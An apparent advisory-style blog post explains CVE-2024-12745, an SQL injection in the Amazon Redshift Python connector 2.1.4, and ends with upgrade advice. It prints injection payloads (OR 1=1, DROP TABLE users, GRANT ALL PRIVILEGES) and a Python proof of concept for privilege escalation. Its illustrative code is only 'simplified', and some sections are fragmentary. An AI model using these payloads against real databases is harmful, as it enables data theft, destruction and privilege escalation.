CVE CyberSecurity Database News

CVE-2024-12745 - Exploiting SQL Injection in Amazon Redshift Python Connector v2.1.4

Poster -

Author: SecureFuse Labs

Introduction

In February 2024, a serious SQL injection vulnerability, CVE-2024-12745, was discovered in the Amazon Redshift Python Connector, specifically in version 2.1.4. This flaw allows attackers to escalate privileges or execute arbitrary SQL commands through the connector’s metadata APIs: get_schemas, get_tables, and get_columns. If you’re responsible for Redshift pipeline integrations or data engineering with Python, read closely—your infrastructure might be at risk.

This post breaks down how the vulnerability works, provides proof-of-concept (PoC) code, and explains how to stay safe.

What Is CVE-2024-12745?

The Redshift Python Connector helps developers and analysts interact with Amazon Redshift clusters from Python scripts and notebooks. Like all middle-layer code, it needs to safely handle user input that interacts with database queries.

The Vulnerability

CVE-2024-12745 is a classic SQL Injection: unsanitized user input gets directly interpolated into an underlying SQL query. Attackers can exploit this to read confidential data, escalate privileges, or modify the database.

get_columns

These methods accept string arguments that get directly inserted into SQL queries without proper escaping.

Exploit Details: How Does It Work?

Let’s look at a simplified version of the vulnerable code from v2.1.4’s cursor.py:

def get_schemas(self, schema_pattern):
    query = f"SELECT schema_name FROM information_schema.schemata WHERE schema_name LIKE '{schema_pattern}'"
    self.execute(query)
    return self.fetchall()

If schema_pattern is set to

%' OR 1=1;--

the query becomes

SELECT schema_name FROM information_schema.schemata WHERE schema_name LIKE '%' OR 1=1;--'

Result: All schemas are leaked, not just those matching a safe pattern.

Suppose a user passes a more dangerous payload

%' ; DROP TABLE users; --

Now the database might execute the injected DROP TABLE users statement, potentially erasing critical user data.

Here’s a proof-of-concept to demonstrate the injection

import redshift_connector

conn = redshift_connector.connect(
    host='<your_cluster>.redshift.amazonaws.com',
    database='dev',
    user='normal_user',
    password='yourpassword'
)

cursor = conn.cursor()

malicious_schema = "%'; GRANT ALL PRIVILEGES ON DATABASE dev TO normal_user; --"

# This will inject a privilege escalation command!
try:
    schemas = cursor.get_schemas(malicious_schema)
    print("Schemas:", schemas)
except Exception as e:
    print("Error:", e)

Result: After execution, normal_user may suddenly have full privileges on the database.

Remediation

Amazon recommends upgrading the driver to v2.1.5 (or later), which properly sanitizes all arguments and uses bind parameters to prevent injection.

- Release notes for 2.1.5
- Security advisory

If you can’t upgrade: Downgrade to v2.1.3, which does not contain the vulnerable code. Do _not_ use v2.1.4.

Also:

Original References

- NIST National Vulnerability Database: CVE-2024-12745
- Official Amazon PR fixing the issue
- Redshift Python Driver GitHub

Conclusion

CVE-2024-12745 is a wake-up call for teams using Amazon Redshift Python Connector v2.1.4. SQL injections are one of the oldest attacks in the book, but remain prevalent—and devastating—when developers trust user input in backend code.

Take action immediately: Patch your connector, monitor your environments, and always validate user input.

Timeline

Published on: 12/24/2024 17:15:08 UTC
Last modified on: 12/26/2024 15:15:06 UTC